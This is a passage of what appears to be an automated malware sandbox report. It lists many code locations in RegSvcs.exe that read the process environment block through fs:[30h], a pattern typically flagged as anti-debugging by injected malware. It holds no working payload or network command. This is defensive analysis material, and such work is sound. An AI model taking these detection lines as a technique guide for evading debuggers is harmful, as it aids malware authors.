Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016127ED mov eax, dword ptr fs:[00000030h]	6_2_016127ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016127ED mov eax, dword ptr fs:[00000030h]	6_2_016127ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016127ED mov eax, dword ptr fs:[00000030h]	6_2_016127ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FC7C0 mov eax, dword ptr fs:[00000030h]	6_2_015FC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F47FB mov eax, dword ptr fs:[00000030h]	6_2_015F47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F47FB mov eax, dword ptr fs:[00000030h]	6_2_015F47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016707C3 mov eax, dword ptr fs:[00000030h]	6_2_016707C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A47A0 mov eax, dword ptr fs:[00000030h]	6_2_016A47A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169678E mov eax, dword ptr fs:[00000030h]	6_2_0169678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F07AF mov eax, dword ptr fs:[00000030h]	6_2_015F07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A660 mov eax, dword ptr fs:[00000030h]	6_2_0162A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A660 mov eax, dword ptr fs:[00000030h]	6_2_0162A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B866E mov eax, dword ptr fs:[00000030h]	6_2_016B866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B866E mov eax, dword ptr fs:[00000030h]	6_2_016B866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01622674 mov eax, dword ptr fs:[00000030h]	6_2_01622674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160C640 mov eax, dword ptr fs:[00000030h]	6_2_0160C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01626620 mov eax, dword ptr fs:[00000030h]	6_2_01626620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01628620 mov eax, dword ptr fs:[00000030h]	6_2_01628620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160E627 mov eax, dword ptr fs:[00000030h]	6_2_0160E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160260B mov eax, dword ptr fs:[00000030h]	6_2_0160260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160260B mov eax, dword ptr fs:[00000030h]	6_2_0160260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160260B mov eax, dword ptr fs:[00000030h]	6_2_0160260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160260B mov eax, dword ptr fs:[00000030h]	6_2_0160260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160260B mov eax, dword ptr fs:[00000030h]	6_2_0160260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160260B mov eax, dword ptr fs:[00000030h]	6_2_0160260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0160260B mov eax, dword ptr fs:[00000030h]	6_2_0160260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E609 mov eax, dword ptr fs:[00000030h]	6_2_0166E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F262C mov eax, dword ptr fs:[00000030h]	6_2_015F262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632619 mov eax, dword ptr fs:[00000030h]	6_2_01632619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0166E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0166E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0166E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0166E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016706F1 mov eax, dword ptr fs:[00000030h]	6_2_016706F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016706F1 mov eax, dword ptr fs:[00000030h]	6_2_016706F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0162A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0162A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0162C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F4690 mov eax, dword ptr fs:[00000030h]	6_2_015F4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F4690 mov eax, dword ptr fs:[00000030h]	6_2_015F4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016266B0 mov eax, dword ptr fs:[00000030h]	6_2_016266B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01616962 mov eax, dword ptr fs:[00000030h]	6_2_01616962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01616962 mov eax, dword ptr fs:[00000030h]	6_2_01616962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01616962 mov eax, dword ptr fs:[00000030h]	6_2_01616962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0163096E mov eax, dword ptr fs:[00000030h]	6_2_0163096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0163096E mov edx, dword ptr fs:[00000030h]	6_2_0163096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0163096E mov eax, dword ptr fs:[00000030h]	6_2_0163096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01694978 mov eax, dword ptr fs:[00000030h]	6_2_01694978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01694978 mov eax, dword ptr fs:[00000030h]	6_2_01694978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167C97C mov eax, dword ptr fs:[00000030h]	6_2_0167C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01670946 mov eax, dword ptr fs:[00000030h]	6_2_01670946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4940 mov eax, dword ptr fs:[00000030h]	6_2_016C4940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0168892B mov eax, dword ptr fs:[00000030h]	6_2_0168892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E8918 mov eax, dword ptr fs:[00000030h]	6_2_015E8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E8918 mov eax, dword ptr fs:[00000030h]	6_2_015E8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167892A mov eax, dword ptr fs:[00000030h]	6_2_0167892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E908 mov eax, dword ptr fs:[00000030h]	6_2_0166E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166E908 mov eax, dword ptr fs:[00000030h]	6_2_0166E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167C912 mov eax, dword ptr fs:[00000030h]	6_2_0167C912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167E9E0 mov eax, dword ptr fs:[00000030h]	6_2_0167E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	6_2_015FA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	6_2_015FA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	6_2_015FA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	6_2_015FA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	6_2_015FA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	6_2_015FA9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016229F9 mov eax, dword ptr fs:[00000030h]	6_2_016229F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016229F9 mov eax, dword ptr fs:[00000030h]	6_2_016229F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016869C0 mov eax, dword ptr fs:[00000030h]	6_2_016869C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016249D0 mov eax, dword ptr fs:[00000030h]	6_2_016249D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BA9D3 mov eax, dword ptr fs:[00000030h]	6_2_016BA9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016029A0 mov eax, dword ptr fs:[00000030h]	6_2_016029A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016789B3 mov esi, dword ptr fs:[00000030h]	6_2_016789B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016789B3 mov eax, dword ptr fs:[00000030h]	6_2_016789B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016789B3 mov eax, dword ptr fs:[00000030h]	6_2_016789B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F09AD mov eax, dword ptr fs:[00000030h]	6_2_015F09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F09AD mov eax, dword ptr fs:[00000030h]	6_2_015F09AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F4859 mov eax, dword ptr fs:[00000030h]	6_2_015F4859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F4859 mov eax, dword ptr fs:[00000030h]	6_2_015F4859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167E872 mov eax, dword ptr fs:[00000030h]	6_2_0167E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167E872 mov eax, dword ptr fs:[00000030h]	6_2_0167E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01686870 mov eax, dword ptr fs:[00000030h]	6_2_01686870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01686870 mov eax, dword ptr fs:[00000030h]	6_2_01686870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01602840 mov ecx, dword ptr fs:[00000030h]	6_2_01602840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01620854 mov eax, dword ptr fs:[00000030h]	6_2_01620854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A830 mov eax, dword ptr fs:[00000030h]	6_2_0162A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169483A mov eax, dword ptr fs:[00000030h]	6_2_0169483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169483A mov eax, dword ptr fs:[00000030h]	6_2_0169483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01612835 mov eax, dword ptr fs:[00000030h]	6_2_01612835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01612835 mov eax, dword ptr fs:[00000030h]	6_2_01612835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01612835 mov eax, dword ptr fs:[00000030h]	6_2_01612835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01612835 mov ecx, dword ptr fs:[00000030h]	6_2_01612835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01612835 mov eax, dword ptr fs:[00000030h]	6_2_01612835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01612835 mov eax, dword ptr fs:[00000030h]	6_2_01612835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167C810 mov eax, dword ptr fs:[00000030h]	6_2_0167C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BA8E4 mov eax, dword ptr fs:[00000030h]	6_2_016BA8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0162C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0162C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E8C0 mov eax, dword ptr fs:[00000030h]	6_2_0161E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C08C0 mov eax, dword ptr fs:[00000030h]	6_2_016C08C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0887 mov eax, dword ptr fs:[00000030h]	6_2_015F0887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167C89D mov eax, dword ptr fs:[00000030h]	6_2_0167C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E8B50 mov eax, dword ptr fs:[00000030h]	6_2_015E8B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015ECB7E mov eax, dword ptr fs:[00000030h]	6_2_015ECB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A4B4B mov eax, dword ptr fs:[00000030h]	6_2_016A4B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A4B4B mov eax, dword ptr fs:[00000030h]	6_2_016A4B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01686B40 mov eax, dword ptr fs:[00000030h]	6_2_01686B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01686B40 mov eax, dword ptr fs:[00000030h]	6_2_01686B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016BAB40 mov eax, dword ptr fs:[00000030h]	6_2_016BAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01698B42 mov eax, dword ptr fs:[00000030h]	6_2_01698B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169EB50 mov eax, dword ptr fs:[00000030h]	6_2_0169EB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C2B57 mov eax, dword ptr fs:[00000030h]	6_2_016C2B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C2B57 mov eax, dword ptr fs:[00000030h]	6_2_016C2B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C2B57 mov eax, dword ptr fs:[00000030h]	6_2_016C2B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C2B57 mov eax, dword ptr fs:[00000030h]	6_2_016C2B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161EB20 mov eax, dword ptr fs:[00000030h]	6_2_0161EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161EB20 mov eax, dword ptr fs:[00000030h]	6_2_0161EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B8B28 mov eax, dword ptr fs:[00000030h]	6_2_016B8B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016B8B28 mov eax, dword ptr fs:[00000030h]	6_2_016B8B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4B00 mov eax, dword ptr fs:[00000030h]	6_2_016C4B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166EB1D mov eax, dword ptr fs:[00000030h]	6_2_0166EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0BCD mov eax, dword ptr fs:[00000030h]	6_2_015F0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0BCD mov eax, dword ptr fs:[00000030h]	6_2_015F0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0BCD mov eax, dword ptr fs:[00000030h]	6_2_015F0BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167CBF0 mov eax, dword ptr fs:[00000030h]	6_2_0167CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161EBFC mov eax, dword ptr fs:[00000030h]	6_2_0161EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01610BCB mov eax, dword ptr fs:[00000030h]	6_2_01610BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01610BCB mov eax, dword ptr fs:[00000030h]	6_2_01610BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01610BCB mov eax, dword ptr fs:[00000030h]	6_2_01610BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F8BF0 mov eax, dword ptr fs:[00000030h]	6_2_015F8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F8BF0 mov eax, dword ptr fs:[00000030h]	6_2_015F8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F8BF0 mov eax, dword ptr fs:[00000030h]	6_2_015F8BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169EBD0 mov eax, dword ptr fs:[00000030h]	6_2_0169EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A4BB0 mov eax, dword ptr fs:[00000030h]	6_2_016A4BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A4BB0 mov eax, dword ptr fs:[00000030h]	6_2_016A4BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600BBE mov eax, dword ptr fs:[00000030h]	6_2_01600BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600BBE mov eax, dword ptr fs:[00000030h]	6_2_01600BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169EA60 mov eax, dword ptr fs:[00000030h]	6_2_0169EA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162CA6F mov eax, dword ptr fs:[00000030h]	6_2_0162CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162CA6F mov eax, dword ptr fs:[00000030h]	6_2_0162CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162CA6F mov eax, dword ptr fs:[00000030h]	6_2_0162CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6A50 mov eax, dword ptr fs:[00000030h]	6_2_015F6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6A50 mov eax, dword ptr fs:[00000030h]	6_2_015F6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6A50 mov eax, dword ptr fs:[00000030h]	6_2_015F6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6A50 mov eax, dword ptr fs:[00000030h]	6_2_015F6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6A50 mov eax, dword ptr fs:[00000030h]	6_2_015F6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6A50 mov eax, dword ptr fs:[00000030h]	6_2_015F6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6A50 mov eax, dword ptr fs:[00000030h]	6_2_015F6A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166CA72 mov eax, dword ptr fs:[00000030h]	6_2_0166CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166CA72 mov eax, dword ptr fs:[00000030h]	6_2_0166CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600A5B mov eax, dword ptr fs:[00000030h]	6_2_01600A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600A5B mov eax, dword ptr fs:[00000030h]	6_2_01600A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162CA24 mov eax, dword ptr fs:[00000030h]	6_2_0162CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161EA2E mov eax, dword ptr fs:[00000030h]	6_2_0161EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01614A35 mov eax, dword ptr fs:[00000030h]	6_2_01614A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01614A35 mov eax, dword ptr fs:[00000030h]	6_2_01614A35
